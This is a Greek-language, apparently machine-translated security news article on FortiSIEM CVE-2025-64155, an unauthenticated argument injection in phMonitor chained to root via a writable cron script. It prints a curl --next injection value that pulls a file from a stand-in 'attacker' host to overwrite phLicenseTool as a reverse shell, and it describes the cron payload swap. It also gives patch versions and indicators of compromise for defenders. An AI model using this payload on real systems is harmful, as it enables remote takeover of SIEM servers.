Τον Αύγουστο του 2025, η Fortinet εξέδωσε μια συμβουλή για το CVE-2025-25256, μια ευπάθεια εισαγωγής εντολών λειτουργικού συστήματος (CWE-78) στο FortiSIEM που εξέθεσε την πλατφόρμα σε εκτέλεση απομακρυσμένου κώδικα χωρίς έλεγχο ταυτότητας μέσω δημιουργημένων αιτημάτων CLI.
Πρακτικά κατορθώματα εμφανίστηκαν στη φύση, ωθώντας την εταιρεία ασφαλείας Horizon3.ai να διεξαγάγει μια βαθιά έρευνα. Η ανάλυσή τους αποκάλυψε μια καταστροφική αλυσίδα: μια ευπάθεια εισαγωγής ορίσματος χωρίς έλεγχο ταυτότητας που επιτρέπει την αυθαίρετη εγγραφή αρχείου και το RCE ως χρήστη διαχειριστή, σε συνδυασμό με μια κλιμάκωση δικαιωμάτων αντικατάστασης αρχείου στην πρόσβαση root.
Η Fortinet εκχώρησε αυτά τα CVE-2025-64155 σύμφωνα με το FG-IR-25-772. Διατίθεται ένα exploit απόδειξης της ιδέας GitHub.
Αυτό σηματοδοτεί ένα άλλο κεφάλαιο στο έπος ευπάθειας του FortiSIEM για τους ερευνητές του Horizon3.ai, οι οποίοι έχουν ανατέμνονται η πλατφόρμα εδώ και χρόνια. Οι προηγούμενες αποκαλύψεις περιλαμβάνουν το CVE-2023-34992 (phMonitor command injection) και το CVE-2024-23108 (δεύτερης τάξης έγχυση), που περιγράφονται λεπτομερώς στις βαθιές καταδύσεις τους.
Αν και δεν περιλαμβάνονται στον κατάλογο Γνωστών Εκμεταλλευόμενων Ευπαθειών της CISA, οι συνομιλίες ransomware που διέρρευσαν το Black Basta από νωρίτερα το 2025 αναφέρονταν σε αυτά τα ελαττώματα, υποδεικνύοντας το ενδιαφέρον των απειλών.
FortiSIEM Architecture and phMonitor Exposure
Το FortiSIEM υποστηρίζει ποικίλες αναπτύξεις: διακομιστές all-in-one ή μοντέλα επόπτη-συλλέκτη, όπου η υπηρεσία phMonitor χειρίζεται την επικοινωνία μεταξύ ρόλων μέσω της θύρας TCP/IP 7900.
Αυτή η υπηρεσία επεξεργάζεται προσαρμοσμένα μηνύματα API χωρίς έλεγχο ταυτότητας, αντιστοιχίζοντας εντολές σε χειριστές μέσω ακεραίων στο phMonitorProcess::initEventHandler. Η προηγούμενη σκλήρυνση μείωσε την έκθεση, αλλά τα τρωτά σημεία παραμένουν.
Το CVE-2025-64155 στοχεύει handleStorageRequest με «ελαστικό» τύπο αποθήκευσης. Ετικέτες XML που ελέγχονται από τον χρήστη, όπως το cluster_name και το cluster_url τροφοδοτούνται στο /opt/phoenix/phscripts/bin/elastic_test_url.sh.
Παρά τα περιτυλίγματα subprocess.run() και τη διαφυγή του wrapShellToken, η κλήση curl του σεναρίου μέσω execve επιτρέπει την εισαγωγή ορίσματος.
Με τη μόχλευση της σκοτεινής-επόμενης σημαίας του curl, οι επιτιθέμενοι αλυσιδεύουν τα αιτήματα: http://attacker:9200 –next -o /opt/phoenix/bin/phLicenseTool http://attacker:9200.
Αυτό αντικαθιστά το phLicenseTool που εκτελείται κάθε λίγα δευτερόλεπτα ως αντίστροφο κέλυφος, παρέχοντας πρόσβαση διαχειριστή.
| Εκδοχή | Προσβεβλημένος | Διάλυμα |
|---|---|---|
| 7.4 | Δεν επηρεάζεται | N/A |
| 7.3 | 7.3.0-7.3.1 | Αναβάθμιση σε 7.3.2+ |
| 7.2 | 7.2.0-7.2.5 | Αναβάθμιση σε 7.2.6+ |
| 7.1 | 7.1.0-7.1.7 | Αναβάθμιση σε 7.1.8+ |
| 7.0 | 7.0.0-7.0.3 | Αναβάθμιση σε 7.0.4+ |
| 6.7 | 6.7.0-6.7.9 | Αναβάθμιση σε 6.7.10+ |
| 6.6 και κάτω | Όλες οι εκδόσεις | Μετεγκατάσταση σε σταθερή έκδοση |
Τα κελύφη διαχειριστή ανοίγουν το δρόμο για root μέσω κατάχρησης cronjob. Το root crontab /etc/cron.d/fsm-crontab εκτελεί το /opt/charting/redishb.sh κάθε λεπτό, με δυνατότητα εγγραφής από τον διαχειριστή παρά την εκτέλεση του root. Η αντικατάστασή του με ένα ωφέλιμο φορτίο παρέχει πλήρη συμβιβασμό.
Δείκτες συμβιβασμού
Παρακολουθήστε /opt/phoenix/log/phoenix.logs για καταχωρήσεις PHL_ERROR που καταγράφουν κατάχρηση elastic_test_url.sh, συμπεριλαμβανομένων κακόβουλων διευθύνσεων URL και αρχείων στόχων (π.χ. αντικαθιστά το phLicenseTool).
Η Fortinet ζητά αναβαθμίσεις και περιορισμούς της θύρας 7900. Οι οργανισμοί θα πρέπει να ελέγχουν τα αρχεία καταγραφής και να επιδιορθώνουν αμέσως εν μέσω αυξανόμενης στόχευσης SIEM.
